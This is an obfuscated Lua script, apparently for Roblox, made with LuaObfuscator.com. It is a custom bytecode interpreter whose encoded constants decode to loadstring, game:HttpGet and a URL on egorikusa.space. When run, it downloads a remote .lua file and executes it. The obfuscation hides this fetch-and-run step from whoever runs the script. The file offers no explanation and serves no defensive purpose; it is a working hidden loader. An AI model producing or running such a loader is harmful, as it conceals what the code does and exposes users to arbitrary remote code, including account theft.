--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v79=v2(v0(v30,16));if v19 then local v89=v5(v79,v19);v19=nil;return v89;else return v79;end end end);local function v20(v31,v32,v33) if v33 then local v80=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-1) -(v32-1)) + (2 -1))) ;return v80-(v80%(620 -(555 + 64))) ;else local v81=(933 -(857 + 19 + 55))^(v32-(569 -(367 + 201))) ;return (((v31%(v81 + v81))>=v81) and (928 -(214 + 713))) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (879 -(282 + 595)) );v18=v18 + (1639 -(1523 + 114)) ;return (v36 * (231 + 25)) + v35 ;end local function v23() local v37=0 -0 ;local v38;local v39;local v40;local v41;while true do if (v37==(1065 -(68 + 997))) then v38,v39,v40,v41=v1(v16,v18,v18 + (1273 -((1183 -(892 + 65)) + 1044)) );v18=v18 + 4 ;v37=4 -(7 -4) ;end if (v37==(118 -(32 + (157 -72)))) then return (v41 * (16441815 + 335401)) + (v40 * 65536) + (v39 * ((104 -47) + 199)) + v38 ;end end end local function v24() local v42=v23();local v43=v23();local v44=351 -(87 + 46 + 217) ;local v45=(v20(v43,181 -(67 + 113) ,20) * ((2 + (0 -0))^32)) + v42 ;local v46=v20(v43,51 -30 ,31);local v47=((v20(v43,24 + 8 )==(1 + 0)) and  -(3 -2)) or (953 -(802 + 150)) ;if (v46==(0 -0)) then if (v45==(0 -0)) then return v47 * (0 + 0) ;else v46=998 -(915 + 82) ;v44=0 -0 ;end elseif (v46==(1193 + 854)) then return ((v45==(0 -0)) and (v47 * (1/0))) or (v47 * NaN) ;end return v8(v47,v46-(2210 -(1069 + 118)) ) * (v44 + (v45/(((795 -(368 + 423)) -2)^(113 -61)))) ;end local function v25(v48) local v49=0 -0 ;local v50;local v51;while true do if (v49==(21 -(10 + (438 -(44 + 386))))) then return v6(v51);end if (v49==(1487 -(998 + 488))) then v50=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;v49=2;end if (v49==(7 -5)) then v51={};for v90=443 -(133 + 283 + 26) , #v50 do v51[v90]=v2(v1(v3(v50,v90,v90)));end v49=9 -6 ;end if (v49==(0 + 0 + 0)) then v50=nil;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=439 -(145 + 293) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 1002 -(241 + 761) ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do if (2==v52) then for v92= #"!",v23() do local v93=(function() return 0;end)();local v94=(function() return;end)();while true do if (v93==0) then v94=(function() return v21();end)();if (v20(v94, #" ", #"!")~=0) then else local v101=(function() return 0;end)();local v102=(function() return;end)();local v103=(function() return;end)();local v104=(function() return;end)();while true do if ((1 + 0)==v101) then local v145=(function() return 0 + 0 ;end)();while true do if (v145~=(0 -0)) then else v104=(function() return {v22(),v22(),nil,nil};end)();if (v102==(374 -(123 + 251))) then local v164=(function() return 0 -0 ;end)();local v165=(function() return;end)();while true do if (v164==(698 -(208 + 490))) then v165=(function() return 0 + 0 ;end)();while true do if (v165~=(0 + 0)) then else v104[ #"xnx"]=(function() return v22();end)();v104[ #"0836"]=(function() return v22();end)();break;end end break;end end elseif (v102== #"\\") then v104[ #"xxx"]=(function() return v23();end)();elseif (v102==(838 -(660 + 176))) then v104[ #"91("]=(function() return v23() -((1 + 1)^16) ;end)();elseif (v102== #"xnx") then local v170=(function() return 202 -(14 + 188) ;end)();while true do if (v170~=0) then else v104[ #"asd"]=(function() return v23() -((677 -(534 + 141))^16) ;end)();v104[ #"0313"]=(function() return v22();end)();break;end end end v145=(function() return 1;end)();end if (v145~=(1 + 0)) then else v101=(function() return 2;end)();break;end end end if (v101==(2 + 0)) then if (v20(v103, #"{", #"\\")~= #"~") then else v104[2]=(function() return v58[v104[2 + 0 ]];end)();end if (v20(v103,3 -1 ,2 -0 )== #"{") then v104[ #"asd"]=(function() return v58[v104[ #"xxx"]];end)();end v101=(function() return 3;end)();end if (v101==0) then local v146=(function() return 0 -0 ;end)();while true do if (1==v146) then v101=(function() return 1;end)();break;end if (v146~=0) then else v102=(function() return v20(v94,2 + 0 , #"asd");end)();v103=(function() return v20(v94, #"xnxx",4 + 2 );end)();v146=(function() return 1;end)();end end end if (v101~=3) then else if (v20(v103, #"-19", #"91(")== #"!") then v104[ #"asd1"]=(function() return v58[v104[ #"asd1"]];end)();end v53[v92]=(function() return v104;end)();break;end end end break;end end end for v95= #",",v23() do v54[v95-#"|" ]=(function() return v28();end)();end return v56;end if ( #"\\"==v52) then local v85=(function() return 396 -(115 + 281) ;end)();local v86=(function() return;end)();while true do if (v85==0) then v86=(function() return 0 -0 ;end)();while true do if (v86==(2 + 0)) then v52=(function() return 4 -2 ;end)();break;end if (v86~=0) then else v57=(function() return v23();end)();v58=(function() return {};end)();v86=(function() return 3 -2 ;end)();end if (v86==(868 -(550 + 317))) then for v106= #"\\",v57 do local v107=(function() return 0;end)();local v108=(function() return;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if (v107==0) then v108=(function() return 0;end)();v109=(function() return nil;end)();v107=(function() return 1 -0 ;end)();end if (v107==1) then v110=(function() return nil;end)();while true do if ((0 -0)==v108) then local v162=(function() return 0;end)();while true do if (v162==(2 -1)) then v108=(function() return 286 -(134 + 151) ;end)();break;end if (v162==(1665 -(970 + 695))) then v109=(function() return v21();end)();v110=(function() return nil;end)();v162=(function() return 1 -0 ;end)();end end end if (v108==(1991 -(582 + 1408))) then if (v109== #"!") then v110=(function() return v21()~=0 ;end)();elseif (v109==2) then v110=(function() return v24();end)();elseif (v109== #"xxx") then v110=(function() return v25();end)();end v58[v106]=(function() return v110;end)();break;end end break;end end end v56[ #"asd"]=(function() return v21();end)();v86=(function() return 6 -4 ;end)();end end break;end end end if (v52==0) then local v87=(function() return 0 -0 ;end)();local v88=(function() return;end)();while true do if (v87~=0) then else v88=(function() return 0 -0 ;end)();while true do if (v88==2) then v52=(function() return  #"~";end)();break;end if (v88~=1) then else v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v88=(function() return 2;end)();end if (v88~=0) then else v53=(function() return {};end)();v54=(function() return {};end)();v88=(function() return 1 -0 ;end)();end end break;end end end end end local function v29(v59,v60,v61) local v62=v59[242 -(187 + 54) ];local v63=v59[782 -(162 + 618) ];local v64=v59[1 + 2 ];return function(...) local v65=v62;local v66=v63;local v67=v64;local v68=v27;local v69=1 + 0 + 0 ;local v70= -(1 + 0 + 0);local v71={};local v72={...};local v73=v12("#",...) -(1 -0) ;local v74={};local v75={};for v82=0 + 0 ,v73 do if ((v82>=v67) or (3755<=915)) then v71[v82-v67 ]=v72[v82 + (1637 -(1373 + 263)) ];else v75[v82]=v72[v82 + (1001 -((977 -526) + 549)) ];end end local v76=(v73-v67) + 1 + 0 ;local v77;local v78;while true do v77=v65[v69];v78=v77[1 -0 ];if (v78<=7) then if ((3946>3743) and (v78<=(4 -1))) then if (v78<=(1385 -(746 + 638))) then if ((v78>(0 + 0)) or (1335>=3306)) then v75[v77[2 -(0 -0) ]]();else v75[v77[343 -(218 + 123) ]]=v77[1584 -(1535 + 46) ];end elseif (v78==(2 + 0)) then do return;end else v75[v77[1 + 1 ]]=v77[563 -(306 + 254) ]~=(0 + 0) ;end elseif ((4844>2253) and (v78<=(5 + 0))) then if (v78>(7 -3)) then v75[v77[1469 -(899 + 568) ]]=v77[1 + 2 ];else local v116=0 + 0 ;local v117;while true do if ((v116==(0 -0)) or (4372==1850)) then v117=v77[2];v75[v117]=v75[v117](v13(v75,v117 + (2 -1) ,v70));break;end end end elseif (v78==(609 -((599 -331) + 335))) then local v118=(366 + 891) -(1043 + 214) ;local v119;local v120;while true do if ((232<821) and (v118==(290 -(60 + 230)))) then v119=v77[574 -((2058 -1632) + 146) ];v120=v75[v77[1 + 2 ]];v118=2 -1 ;end if ((1457 -(282 + 1174))==v118) then v75[v119 + (321 -(53 + 267)) ]=v120;v75[v119]=v120[v77[(1568 -(239 + 514)) -(569 + 242) ]];break;end end else local v121=v77[(2 + 3) -3 ];local v122,v123=v68(v75[v121](v13(v75,v121 + 1 ,v77[(1330 -(797 + 532)) + 2 ])));v70=(v123 + v121) -(1025 -(513 + 193 + 318)) ;local v124=1251 -(244 + 477 + 530) ;for v141=v121,v70 do local v142=1271 -(945 + 326) ;while true do if ((452==452) and (v142==((0 -0) + 0))) then v124=v124 + (2 -1) ;v75[v141]=v122[v124];break;end end end end elseif (v78<=11) then if (((518<902) and (v78<=(8 + 1))) or (4557<2087)) then if ((3874==3874) and (v78>(8 + 0))) then do return;end else local v125=v77[(1203 -(373 + 829)) + 1 ];local v126,v127=v68(v75[v125](v13(v75,v125 + ((1470 -(476 + 255)) -(542 + 196)) ,v77[703 -(271 + 429) ])));v70=(v127 + v125) -(1 + 0) ;local v128=1500 -(1408 + 92) ;for v143=v125,v70 do local v144=1086 -(461 + 625) ;while true do if (v144==(0 + 0)) then v128=v128 + 1 + 0 ;v75[v143]=v126[v128];break;end end end end elseif ((v78==(1298 -(993 + 295))) or (1938>4935)) then v75[v77[1 + 1 ]]=v61[v77[1174 -(418 + 753) ]];else local v131=v77[1 + 1 ];v75[v131]=v75[v131](v13(v75,v131 + 1 + 0 ,v70));end elseif ((v78<=(4 + (1139 -(369 + 761)))) or (4255<3423)) then if ((1454<=2491) and (v78==(4 + 8))) then v75[v77[531 -(235 + 171 + 123) ]]();else v75[v77[2]]=v61[v77[3]];end elseif ((2994>858) and (v78==(1783 -(1749 + 20)))) then local v135=v77[1 + 1 ];local v136=v75[v77[1325 -(1249 + 73) ]];v75[v135 + 1 + (0 -0) ]=v136;v75[v135]=v136[v77[981 -(553 + (803 -379)) ]];else v75[v77[1 + 1 ]]=v77[1148 -(466 + 679) ]~=(0 -0) ;end v69=v69 + ((240 -(64 + 174)) -1) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403343Q00682Q7470733A2Q2F65676F72696B7573612E73706163652F65363330636461666532663465632Q6237336263353837662E6C756100093Q00120D3Q00013Q00120D000100023Q00200E000100010003001205000300044Q0003000400014Q0007000100044Q00045Q00022Q00013Q000100012Q00093Q00017Q00",v9(),...);